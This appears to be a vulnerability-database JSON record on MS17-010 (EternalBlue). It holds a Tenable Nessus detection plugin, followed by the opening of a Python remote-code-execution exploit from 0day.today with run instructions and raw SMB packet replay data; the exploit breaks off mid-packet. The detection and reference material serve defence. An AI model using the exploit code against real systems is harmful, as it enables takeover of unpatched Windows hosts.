["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-22T13:00:41", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-22T13:00:41", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}], "zdt": [{"id": "1337DAY-ID-27752", "hash": "7fd52da02c3bce063b3227f881a6928a", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010) Exploit", "description": "Exploit for windows platform in category remote exploits", "published": "2017-05-10T00:00:00", "modified": "2017-05-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/27752", "reporter": "Juan Sacco", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-03-19T02:05:14", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2018-03-19T02:05:14", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2018-03-19T02:05:14", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/27752", "sourceData": "# Exploit Author: Juan Sacco\r\n# MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\r\n# Tested on: Microsoft Windows Server 2008 x64 SP1 R2 Standard \r\n#\r\n# Description: SMBv1 SrvOs2FeaToNt OOB is prone to a remote code execution\r\n# vulnerability because the application fails to perform adequate\r\n# boundary-checks on user-supplied input. Srv.sys process SrvOs2FeaListSizeToNt \r\n# and when the logic is not correct it leads to a cross-border copy. The vulnerability trigger point is as follows:\r\n#\r\n# Vulnerable code:\r\n# unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)\r\n# {\r\n# int v4; // [email\u00a0protected]\r\n# _BYTE *v5; // [email\u00a0protected]\r\n# unsigned int result; // [email\u00a0protected]\r\n# \r\n# v4 = a1 + 8;\r\n# *(_BYTE *)(a1 + 4) = *(_BYTE *)a2;\r\n# *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);\r\n# *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);\r\n# _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));\r\n# v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4);\r\n# *v5++ = 0;\r\n# _memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));\r\n# result = (unsigned int)&v5[*(_WORD *)(a1 + 6) + 3] & 0xFFFFFFFC;\r\n# *(_DWORD *)a1 = result - a1;\r\n# return result;\r\n# }\r\n#\r\n# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the\r\n# context of the application. Failed exploit attempts could result in a\r\n# denial-of-service condition.\r\n#\r\n# Timeline:\r\n# 04/05/2017 - Research started\r\n# 04/05/2017 - First PoC using original code\r\n# 05/05/2017 - Kernel debugging on Windows 2008\r\n# 05/05/2017 - Exploit code first draft\r\n# 06/05/2017 - Functional PoC\r\n# 07/05/2017 - Added support for Zerosum0x0 shellcode\r\n# 08/05/2017 - Code revisited and bugs fixed\r\n# 09/05/2017 - First successful shell\r\n# 09/05/2017 - Exploit tested in QA Laba\r\n# 09/05/2017 - Exploit code final review\r\n# 09/05/2017 - Publish\r\n#\r\n# Vendor homepage: http://www.microsoft.com\r\n# This exploit is a port from the amazing work made by Risksense. Checkout the original project at: https://github.com/RiskSense-Ops/MS17-010\r\n# Credits: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco \r\n#\r\n# How to run: python3 ms17010.py ipaddress\r\n#\r\nimport sys\r\nimport socket\r\nimport time\r\nimport ast\r\nimport binascii\r\nimport os\r\n \r\ndef mod_replay():\r\n datfile = [\"('connect', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x88\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\r\\\\xff\\\\x00\\\\x88\\\\x00\\\\x04\\\\x11\\\\n\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xd4\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x002\\\\x001\\\\x009\\\\x005\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x005\\\\x00.\\\\x000\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 'userid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00X\\\\xffSMBu\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x04\\\\xff\\\\x00X\\\\x00\\\\x08\\\\x00\\\\x01\\\\x00-\\\\x00\\\\x00\\\\\\\\\\\\x00\\\\\\\\\\\\x001\\\\x007\\\\x002\\\\x00.\\\\x001\\\\x006\\\\x00.\\\\x009\\\\x009\\\\x00.\\\\x005\\\\x00\\\\\\\\\\\\x00I\\\\x00P\\\\x00C\\\\x00$\\\\x00\\\\x00\\\\x00?????\\\\x00', 0.0)\", \"('recv', 1, 'treeid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x048\\\\xffSMB\\\\xa0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x14\\\\x01\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x01\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00h\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\xec\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\